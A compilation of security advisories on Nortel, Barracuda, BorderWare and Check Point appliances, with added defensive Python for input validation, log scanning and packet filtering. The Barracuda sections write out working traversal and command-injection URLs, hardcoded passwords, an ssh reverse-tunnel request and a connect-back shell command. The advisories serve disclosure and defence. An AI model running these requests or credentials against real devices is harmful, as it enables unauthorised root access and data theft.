http://secunia.com/advisories/24962/
Description:
A vulnerability and a security issue have been reported in Nortel VPN Routers, which can be exploited by malicious people to bypass certain security restrictions or manipulate certain data.
1) Two default user accounts ("FIPSecryptedtest1219" and "FIPSunecryptedtest1219") are configured on the VPN Router, which are not readily visible to the system manager. These can be exploited to gain unauthorized access to the private network.
2) Missing authentication checks within two template files of the web management tool can be exploited to e.g. modify certain router configurations.
An issue regarding same DES keys used to encrypt user's passwords has also been reported, which can facilitate brute-force attacks on user's passwords if the attacker were to gain access to the LDAP store.
The vulnerability and security issue reportedly affect the following products:
* Contivity 1000 VPN Switch
* Contivity 2000 VPN Switch
* Contivity 4000 VPN Switch
* VPN Router 5000
* VPN Router Portfolio
Solution:
Update to versions 6_05.140, 5_05.304, or 5_05.149.
Provided and/or discovered by:
The vendor credits Detack GmbH.
Labels: Advisory, Appliance, Backdoor, Insecurity, Vulnerability
Barracuda Networks Spam Firewall Multiple Vulnerabilities
Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001
Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.
A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.
-------
Matthew Hall (lists ecsc co uk)
Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006
Summary:
Lack of input sanitisation in the Barracuda spam firewall
web interface allows execution of commands by unauthenticated users.
Combined with privilege elevation techniques, execution of commands as
the root user is possible allowing a full system compromise.
Details:
In a follow-up investigation to bid 19276 - 'Barracuda Vulnerability:
Arbitrary File Disclosure [NNL-20060801-02]' by Greg Sinclair, further
investigation was performed by the Internet Defence Security Team and
several extra vulnerabilities were discovered, which when leveraged with
privilege escalation techniques allowed the remote execution of commands
as the root user without any authentication.
The original discovery by Greg Sinclair showed that it was possible to
open arbitrary files, either owned by the user/group 'nobody:nogroup' or
with world-read access, through the web interface using a path
sanitation vulnerability in preview_email.cgi, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.
Using this vulnerability, it is also possible to use the pipe character
(|) to redirect the stdout of any programs run, to the stdin of the file
open function to print the output of the command back to the web
interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20-la%20/|
It was then possible to leverage further privileges, as the user the
http daemon runs as (nobody), is granted root level access to several
system commands via the use of sudo, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/sudo%20touch%20/foo|
(Repeating the previous command should then show that the file 'foo' has
been created with root permissions in '/').
The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(as well as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)
Access to such commands as chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the web interface, without the use
of sudo, and would run with root privileges.
As such, a complete system compromise is possible remotely through the
web interface without any authentication.
It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' a hardcoded 'guest' user password existed,
which was 'bnadmin99'.
During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If this case is true, then it is possible to login to the web interface
as the admin user using the password 'adminbn99'.
In order to gain elevated privileges to login to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.
It was possible to expose the ssh rsa public key, which then could be
copied to a users' '.ssh/authorized_keys2' on a local machine, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/cat%20/home/emailswitch/code/config/id_rsa.pub|
With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:localhost:443%20@|
It was then possible to login to 'https://127.0.0.1:8080/' with the
username of 'admin' and password of 'adminbn99' and manage the device as
an administrator.
It was noted that the original file input sanitation vulnerability seems
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.
So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remains the same.
Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.
The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.
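The preview_email.cgi issue above comes down to a missing confinement check on the `file` parameter, plus a file-open call that treats a trailing pipe as a command. The following is an added example, not code from the advisory or from Barracuda: a confinement check of the kind such a CGI needs, and a scan that runs the same check over web-server access-log lines to find requests that would have been refused. It assumes (constructed for this example) that the CGI is only meant to read files under `/mail/mlog`, that the open call behaves like a Perl two-argument `open()`, and that the logs are in Apache combined format; the sample log lines are constructed.

```python
"""Added example; not code from the advisories above or from Barracuda.

  * resolve_file_param(): decodes and confines a user-supplied 'file'
    parameter, rejecting traversal out of the log directory and the
    metacharacters a Perl-style two-argument open() would act on (a
    trailing '|' turns the "file name" into a command).
  * scan_access_log(): runs that check over access-log lines to find the
    requests that would have been refused.

Assumptions (constructed): the CGI serves only files under ALLOWED_ROOT,
the open call behaves like Perl's 2-arg open(), Apache combined log format.
"""
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

ALLOWED_ROOT = "/mail/mlog"   # constructed: the only directory the CGI should serve

# Characters that change what a Perl two-argument open() does with its string.
_META = re.compile(r"[|<>]")


def resolve_file_param(raw: str, root: str = ALLOWED_ROOT) -> Optional[str]:
    """Return the normalised absolute path if it lies under `root`, else None.

    Normalisation is lexical (posixpath.normpath).  Where `root` may contain
    symlinks, resolve with os.path.realpath() and compare the same way.
    """
    value = unquote(raw)
    if "\0" in value or _META.search(value) or value.strip() != value:
        return None            # NUL, pipe/redirect, or whitespace open() would trim
    candidate = value if value.startswith("/") else posixpath.join(root, value)
    normalised = posixpath.normpath(candidate)
    root = posixpath.normpath(root)
    if normalised == root or normalised.startswith(root + "/"):
        return normalised
    return None                # '..' walked out of the log directory


_REQ = re.compile(r'"GET /cgi-bin/preview_email\.cgi\?file=([^ "]*) ')


def scan_access_log(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, decoded file parameter) for every preview request that
    resolve_file_param() refuses."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQ.search(line)
        if m and resolve_file_param(m.group(1)) is None:
            hits.append((n, unquote(m.group(1))))
    return hits


# Constructed sample log: one legitimate preview and two requests of the
# shape shown in the advisory above.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Aug/2006:22:10:01 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/2006-08-03.log HTTP/1.1" 200 512',
    '203.0.113.7 - - [03/Aug/2006:22:11:14 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp HTTP/1.1" 200 9044',
    '203.0.113.7 - - [03/Aug/2006:22:12:40 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20-la%20/| HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for n, param in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: rejected file parameter {param!r}")
```

The check decodes before testing, because the pipe arrives percent-encoded in the log but decoded by the time the CGI opens the file; the two traversal requests from the advisory are refused, the plain log preview is not.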
Exploit
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl
Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.
Labels: Appliance, Email, Spam, Vulnerability
Barracuda Spam Firewall default account
gssinclannlsoftware.com
Date: Tue Aug 01 2006 - 16:18:15 CDT
Title: Barracuda Hardcoded Password Vulnerability
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair (gssinclannlsoftware.com)
Discovered on: 28 May 2006
Overview:
Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to information disclosure which is made possible by a default guest password.
Details:
The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 have a hardcoded password for the "guest" account in the Login.pm script. This script is called to validate any user who attempts to login to the barracuda's web interface (typically at http://:8080 or https://). While the guest account has limited access, the following information can be obtained:
* system configuration including IP accesses, admin IP ACLs
* email message logs (but not the content of the messages)
* version information of both spam/antivirus definitions and system firmware version
Used in conjunction with the vulnerability "Barracuda Arbitrary File Disclosure" (NNL-20060801-02), the integrity of the system can be compromised. An attacker can use both vulnerabilities to download both confidential emails as well as the configuration information (including the admin password).
Additionally, while some accounts such as "admin" are bound by user definable IP ACLs, the guest account is not. This means that sensitive information can be disclosed to ANY IP address regardless of the user defined network restrictions.
Proof of Concept:
Enter the username "guest" into the login page of any open barracuda and the password "bnadmin99"
Recommendations:
* Never allow your Barracuda web interface to be accessible from untrusted networks (especially the Internet)
* Upgrade to version 3.3.0.54 or later
Vendor Contact:
29 May 2006 - Initial Vendor Contact
24 June 2006 - Vendor replies with prospect of fix
17 July 2006 - NNL request status update, no reply
01 Aug 2006 - NNL releases vuln report, notifies vendor of release
Labels: Advisory, Appliance, Email, Spam, Vulnerability
Jean-Sébastien Guay-Leroux jean-sebastien at guay-leroux.com
Tue Apr 4 00:51:17 BST 2006
Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: Barracuda Networks
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.10045
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:
* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.
Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for
successful exploitation.
For further information about the details of the bugs, you can consult OSVDB
#5753 and #5754.
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.
It is recommended to update to firmware #3.3.03.022.
VI. CREDITS
Ulf Harnhammar who found the original LHA flaw.
Jean-Sébastien Guay-Leroux who conducted further research on the bug
and produced an exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public
Labels: Appliance, Bug, Spam, Vulnerability
OSVDB ID: 23939
Disclosure Date: Mar 17, 2006
Description:
BorderWare MXtreme contains a flaw related to the web administration interface. No further details have been provided.
Vulnerability Classification:
Remote/Network Access Required
Unknown Attack Type
Loss Unknown
Exploit Unavailable
Verified
Web Related
Products:
BorderWare Technologies Inc. MXtreme Mail Firewall 5.0
BorderWare Technologies Inc. MXtreme Mail Firewall 6.0
Solution:
Apply the patch provided by BorderWare, as it has been reported to fix this vulnerability. In addition, the vendor recommends disabling HTTP/HTTPS login access until patches can be applied.
External References:
CVE ID: 2006-1254
National Vulnerability Database: CVE-2006-1254
Bugtraq ID: 17140
Secunia Advisory ID: 19223
Security Tracker: 1015787
FrSIRT Advisory: ADV-2006-0972
Credit:
OSVDB does not have information on who discovered this vulnerability. If you have credit information please send it to OSVDB Moderators
Labels: Advisory, Appliance, Bug, Vulnerability
Barracuda Spam Firewall Hashed Password Disclosure
OSVDB ID: 20879
Disclosure Date: Nov 16, 2005
Description:
Barracuda Spam Firewall contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an end user interacts with the system, which may disclose the user's encoded password in the URL. The encoded password is transmitted without the protection of SSL encryption, but would require an attacker to sniff the connection to obtain the information.
Vulnerability Classification:
Remote/Network Access Required
Cryptographic Attack
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern
Products:
Barracuda Networks Barracuda Spam Firewall 3.1.17
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
External References:
Related OSVDB ID: 20878
Vendor: Barracuda Networks
Other Advisory URL: http://osvdb.org/ref/20/20879-barracuda.txt
Credit:
security curmudgeon - attrition.org
Labels: Advisory, Appliance, Email, Spam, Vulnerability
------------------------------------------------------------------------
Inside Security GmbH Vulnerability Notification
Revision 1.6 2001-07-14
------------------------------------------------------------------------
The latest version of this document is available at
http://www.inside-security.de/fw1_rdp.html
The proof of concept code is available at
http://www.inside-security.de/fw1_rdp_poc.html
-----------------------------------------------
Check Point FireWall-1 RDP Bypass Vulnerability
-----------------------------------------------
Summary:
It is possible to bypass FireWall-1 with faked RDP packets if the default implied rules are being used.
RDP (Reliable Data Protocol, but not the one specified in RFCs 908/1151, a Check Point proprietary one) is used by FireWall-1 on top of the User Datagram Protocol (UDP) to establish encrypted sessions.
FireWall-1 management rules allow arbitrary eitherbound RDP connections to traverse the firewall. Only the destination port (259) and the RDP command are verified by FireWall-1. By adding a faked RDP header to normal
UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall.
Implied rules can't be easily modified or removed (except all together) with the FireWall-1 policy editor.
Impact:
Given access to hosts on both sides of a firewall a tunnel to bypass the firewall could be built using this vulnerability. Such access could be gained with a trojan horse that uses this vulnerability to connect from the inside back to the machine of the attacker. But also arbitrary connections from the outside to machines behind the firewall (even if they are supposedly totally blocked from the in- and outside by the firewall) can be established, for example to communicate with infiltrated programs like viruses.
Affected systems:
Check Point VPN-1(TM) & FireWall-1(R) Version 4.1
Releases tested:
Build 41439 [VPN + DES]
Build 41439 [VPN + DES + STRONG]
Build 41716 [VPN + DES + STRONG] (SP2)
Vendor status:
The vulnerability has been reported to Check Point and a fix is scheduled for today [2001-07-09]. We want to thank Check Point Software Technologies for their quick reaction.
Detailed description:
As FireWall-1 rulesets are created they are translated into the INSPECT language (similar to C) and by default include the file $FWDIR/lib/base.def which itself includes $FWDIR/lib/crypt.def in line 259. Together they define
protocol names and the so called implied rules (for FireWall-1 management). In line 62 the macro accept_fw1_rdp is defined to accept any eitherbound connection that matches the following characteristics:
- Protocol UDP
- Destination port 259 (RDP)
- RDP Command RDPCRYPTCMD (100), RDPCRYPT_RESTARTCMD (101),
RDPUSERCMD (150) or RDPSTATUSCMD (128).
The RDP command types RDPCRYPT = {RDPCRYPTCMD,RDPUSERCMD,RDPSTATUSCMD} and RDPCRYPT_RESTART = {RDPCRYPT_RESTARTCMD} will permit traversal of faked RDP packets (regardless of the value of NO_ENCRYPTION_FEATURES, undefined by default).
Proof of concept code:
Proof of concept code has been submitted to Check Point. We are planning to make this code publicly available within a few days.
[ Updated 2001-07-13: Proof of concept code was released:
http://www.inside-security.de/fw1_rdp_poc.html ]
Suggested workarounds:
- Comment line 2646 of base.def ( accept_fw1_rdp; )
- Deactivate implied rules in the Check Point policy editor (and build
your own rules for management connections).
- Block UDP traffic to port 259 on your perimeter router.
Solution:
Apply the fix available from Check Point:
http://www.checkpoint.com/techsupport/alerts/rdp.html
Credits:
This vulnerability was found and documented by Jochen Thomas Bauer
and Boris Wesslowski
of Inside Security GmbH, Stuttgart, Germany.
------------------------------------------------------------------------
(C) 2001 Inside Security GmbH
This notice may be redistributed freely provided that redistributed copies
are complete and unmodified, and include all date and version information.
ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES,
INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED
AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
IN NO EVENT WILL INSIDE SECURITY GMBH BE LIABLE FOR ANY LOST REVENUE,
PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL
OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF
LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION
CONTAINED IN THIS SECURITY BULLETIN, EVEN IF INSIDE SECURITY GMBH HAS
BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable
law, void, or unenforceable in any jurisdiction, then such provisions are
waived to the extent necessary for this disclaimer to be otherwise
enforceable in such jurisdiction.
------------------------------------------------------------------------
Labels: Advisory, Appliance, Firewall, Vulnerability
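The third workaround in the Check Point notice above is to block UDP traffic to port 259 at the perimeter router. The following is an added example, not code from Inside Security or Check Point: that filter written out as a classifier over raw IPv4 datagrams, including the case a plain port filter gets wrong, a non-initial IP fragment, which carries no UDP header and so has no readable destination port. It assumes raw IPv4 input with no link-layer header; the packet-building helper and the sample packets are constructed for this example and leave checksums at zero.

```python
"""Added example; not code from Inside Security's advisory or from Check Point.

classify() applies the advisory's workaround "block UDP traffic to port 259"
to one raw IPv4 datagram and returns a verdict with a reason.  Non-initial
fragments are reported as 'inspect' rather than passed, because the UDP
header (and so the port) is only present in the first fragment.

Assumptions (constructed): raw IPv4 input, no link-layer header; the test
packet builder leaves IP and UDP checksums at zero.
"""
import socket
import struct
from typing import Tuple

RDP_PORT = 259        # Check Point RDP, as named in the advisory
PROTO_UDP = 17
_IPV4_HDR = "!BBHHHBBH4s4s"   # 20-byte IPv4 header without options


def build_ipv4_udp(src: str, dst: str, sport: int, dport: int,
                   payload: bytes, frag_offset: int = 0) -> bytes:
    """Constructed helper: minimal IPv4 + UDP datagram (checksums zero)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack(_IPV4_HDR, 0x45, 0, 20 + len(udp), 0x1234,
                     frag_offset & 0x1FFF, 64, PROTO_UDP, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + udp


def classify(pkt: bytes) -> Tuple[str, str]:
    """Return ('block' | 'pass' | 'inspect', reason) for one raw IPv4 packet."""
    if len(pkt) < 20:
        return "block", "truncated IPv4 header"
    ver_ihl, _, _, _, flags_frag, _, proto, _, src, dst = struct.unpack(_IPV4_HDR, pkt[:20])
    if ver_ihl >> 4 != 4:
        return "pass", "not IPv4"
    if proto != PROTO_UDP:
        return "pass", "not UDP"
    if flags_frag & 0x1FFF:
        # Only the first fragment holds the UDP header, so the port is not
        # visible here.  Hand it to a reassembling filter instead of letting
        # a port-based rule wave it through.
        return "inspect", "non-initial fragment, UDP ports not present"
    ihl = (ver_ihl & 0x0F) * 4
    if len(pkt) < ihl + 8:
        return "block", "truncated UDP header"
    sport, dport, _, _ = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    flow = f"{socket.inet_ntoa(src)}:{sport} -> {socket.inet_ntoa(dst)}:{dport}"
    if dport == RDP_PORT:
        return "block", "UDP to port 259 (RDP) " + flow
    return "pass", "UDP " + flow


if __name__ == "__main__":
    # Constructed sample traffic: RDP-port datagram, DNS, and a trailing fragment.
    samples = [
        build_ipv4_udp("192.0.2.10", "198.51.100.1", 40000, RDP_PORT, b"\x00" * 16),
        build_ipv4_udp("192.0.2.10", "198.51.100.1", 40001, 53, b"\x00" * 12),
        build_ipv4_udp("192.0.2.10", "198.51.100.1", 40000, RDP_PORT, b"\x00" * 8, frag_offset=1),
    ]
    for p in samples:
        print(classify(p))
```

The 'inspect' verdict is the point of the fragment branch: a router rule that matches only on destination port silently passes every fragment after the first, so a perimeter filter for port 259 needs either fragment reassembly or a rule that handles non-initial fragments explicitly.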